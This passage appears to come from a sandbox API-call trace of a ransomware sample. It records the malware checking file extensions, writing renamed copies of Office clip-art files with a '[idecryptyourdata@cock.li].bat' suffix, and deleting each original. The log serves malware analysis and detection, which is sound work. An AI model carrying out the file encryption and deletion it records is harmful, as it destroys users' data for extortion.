Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.989] lstrlenW (lpString=".1cd") returned 4 [0184.989] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 68 [0184.989] lstrlenW (lpString=".jpg") returned 4 [0184.989] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.989] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.989] lstrlenW (lpString="J0107730.WMF") returned 12 [0184.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.990] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=3060) returned 1 [0184.990] CloseHandle (hObject=0x378) returned 1 [0184.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf")) returned 0x220 [0184.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0184.990] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.990] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0184.991] GetLastError () returned 0x0 [0184.991] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xbf4, lpOverlapped=0x0) returned 1 [0185.340] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xc00, lpOverlapped=0x0) returned 1 [0185.341] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.341] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.342] SetEndOfFile (hFile=0x37c) returned 1 [0185.342] CloseHandle (hObject=0x37c) returned 1 [0185.342] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.342] SetEndOfFile (hFile=0x378) returned 1 [0185.343] CloseHandle (hObject=0x378) returned 1 [0185.343] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.343] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107730.wmf")) returned 1 [0185.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.343] lstrlenW (lpString=".doc") returned 4 [0185.343] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString=".docx") returned 5 [0185.344] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0185.344] lstrlenW (lpString=".pdf") returned 4 [0185.344] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString=".xls") returned 4 [0185.344] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.344] lstrlenW (lpString=".xlsx") returned 5 [0185.344] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0185.344] lstrlenW (lpString=".ppt") returned 4 [0185.344] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.344] lstrlenW (lpString=".zip") returned 4 [0185.344] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.344] lstrlenW (lpString=".rar") returned 4 [0185.344] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString=".bz2") returned 4 [0185.344] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString=".7z") returned 3 [0185.344] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.344] lstrlenW (lpString=".dbf") returned 4 [0185.344] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.344] lstrlenW (lpString=".1cd") returned 4 [0185.344] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.344] lstrlenW (lpString=".jpg") returned 4 [0185.344] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.345] lstrlenW (lpString=".doc") returned 4 [0185.345] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString=".docx") returned 5 [0185.345] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0185.345] lstrlenW (lpString=".pdf") returned 4 [0185.345] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString=".xls") returned 4 [0185.345] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.345] lstrlenW (lpString=".xlsx") returned 5 [0185.345] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0185.345] lstrlenW (lpString=".ppt") returned 4 [0185.345] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.345] lstrlenW (lpString=".zip") returned 4 [0185.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.345] lstrlenW (lpString=".rar") returned 4 [0185.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString=".bz2") returned 4 [0185.345] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString=".7z") returned 3 [0185.345] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.345] lstrlenW (lpString=".dbf") returned 4 [0185.345] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.345] lstrlenW (lpString=".1cd") returned 4 [0185.345] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107730.WMF") returned 68 [0185.345] lstrlenW (lpString=".jpg") returned 4 [0185.345] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.346] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0185.346] lstrlenW (lpString="J0145212.JPG") returned 12 [0185.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.346] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=61633) returned 1 [0185.346] CloseHandle (hObject=0x378) returned 1 [0185.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg")) returned 0x220 [0185.346] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.347] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.347] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0185.347] GetLastError () returned 0x0 [0185.347] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xf0c1, lpOverlapped=0x0) returned 1 [0185.350] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xf0d0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xf0d0, lpOverlapped=0x0) returned 1 [0185.352] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.352] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.352] SetEndOfFile (hFile=0x37c) returned 1 [0185.352] CloseHandle (hObject=0x37c) returned 1 [0185.352] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.352] SetEndOfFile (hFile=0x378) returned 1 [0185.353] CloseHandle (hObject=0x378) returned 1 [0185.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg")) returned 1 [0185.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.354] lstrlenW (lpString=".doc") returned 4 [0185.354] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0185.354] lstrlenW (lpString=".docx") returned 5 [0185.354] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0185.354] lstrlenW (lpString=".pdf") returned 4 [0185.354] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0185.354] lstrlenW (lpString=".xls") returned 4 [0185.354] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0185.354] lstrlenW (lpString=".xlsx") returned 5 [0185.354] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0185.354] lstrlenW (lpString=".ppt") returned 4 [0185.354] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0185.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.354] lstrlenW (lpString=".zip") returned 4 [0185.354] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0185.354] lstrlenW (lpString=".rar") returned 4 [0185.354] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0185.354] lstrlenW (lpString=".bz2") returned 4 [0185.354] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0185.354] lstrlenW (lpString=".7z") returned 3 [0185.354] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0185.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.354] lstrlenW (lpString=".dbf") returned 4 [0185.354] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0185.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.354] lstrlenW (lpString=".1cd") returned 4 [0185.355] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0185.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.355] lstrlenW (lpString=".jpg") returned 4 [0185.355] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0185.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.355] lstrlenW (lpString=".doc") returned 4 [0185.355] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0185.355] lstrlenW (lpString=".docx") returned 5 [0185.355] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0185.355] lstrlenW (lpString=".pdf") returned 4 [0185.355] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0185.355] lstrlenW (lpString=".xls") returned 4 [0185.355] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0185.355] lstrlenW (lpString=".xlsx") returned 5 [0185.355] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0185.355] lstrlenW (lpString=".ppt") returned 4 [0185.355] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0185.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.355] lstrlenW (lpString=".zip") returned 4 [0185.355] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0185.355] lstrlenW (lpString=".rar") returned 4 [0185.355] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0185.355] lstrlenW (lpString=".bz2") returned 4 [0185.355] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0185.355] lstrlenW (lpString=".7z") returned 3 [0185.355] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0185.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.355] lstrlenW (lpString=".dbf") returned 4 [0185.355] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0185.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.356] lstrlenW (lpString=".1cd") returned 4 [0185.356] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0185.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 68 [0185.356] lstrlenW (lpString=".jpg") returned 4 [0185.356] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0185.356] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0185.356] lstrlenW (lpString="J0145272.JPG") returned 12 [0185.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.357] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=49238) returned 1 [0185.357] CloseHandle (hObject=0x378) returned 1 [0185.357] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg")) returned 0x220 [0185.357] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0185.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0185.357] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.357] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0185.358] GetLastError () returned 0x0 [0185.358] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xc056, lpOverlapped=0x0) returned 1 [0185.361] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xc060, lpOverlapped=0x0) returned 1 [0185.363] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.363] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.363] SetEndOfFile (hFile=0x37c) returned 1 [0185.363] CloseHandle (hObject=0x37c) returned 1 [0185.363] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.363] SetEndOfFile (hFile=0x378) returned 1 [0185.364] CloseHandle (hObject=0x378) returned 1 [0185.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.364] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg")) returned 1 [0185.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.365] lstrlenW (lpString=".doc") returned 4 [0185.365] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0185.365] lstrlenW (lpString=".docx") returned 5 [0185.365] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0185.365] lstrlenW (lpString=".pdf") returned 4 [0185.365] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0185.365] lstrlenW (lpString=".xls") returned 4 [0185.365] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0185.365] lstrlenW (lpString=".xlsx") returned 5 [0185.365] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0185.365] lstrlenW (lpString=".ppt") returned 4 [0185.365] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0185.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.367] lstrlenW (lpString=".zip") returned 4 [0185.367] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString=".rar") returned 4 [0185.368] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString=".bz2") returned 4 [0185.368] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0185.368] lstrlenW (lpString=".7z") returned 3 [0185.368] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0185.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.368] lstrlenW (lpString=".dbf") returned 4 [0185.368] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0185.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.368] lstrlenW (lpString=".1cd") returned 4 [0185.368] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0185.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.368] lstrlenW (lpString=".jpg") returned 4 [0185.368] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0185.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.368] lstrlenW (lpString=".doc") returned 4 [0185.368] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0185.368] lstrlenW (lpString=".docx") returned 5 [0185.368] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0185.368] lstrlenW (lpString=".pdf") returned 4 [0185.368] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString=".xls") returned 4 [0185.368] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString=".xlsx") returned 5 [0185.368] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0185.368] lstrlenW (lpString=".ppt") returned 4 [0185.368] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.368] lstrlenW (lpString=".zip") returned 4 [0185.368] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString=".rar") returned 4 [0185.368] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0185.368] lstrlenW (lpString=".bz2") returned 4 [0185.368] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0185.369] lstrlenW (lpString=".7z") returned 3 [0185.369] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0185.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.369] lstrlenW (lpString=".dbf") returned 4 [0185.369] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0185.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.369] lstrlenW (lpString=".1cd") returned 4 [0185.369] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0185.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 68 [0185.369] lstrlenW (lpString=".jpg") returned 4 [0185.369] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0185.369] lstrcmpiW (lpString1=".JPG", lpString2=".bat") returned 1 [0185.369] lstrlenW (lpString="J0145361.JPG") returned 12 [0185.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 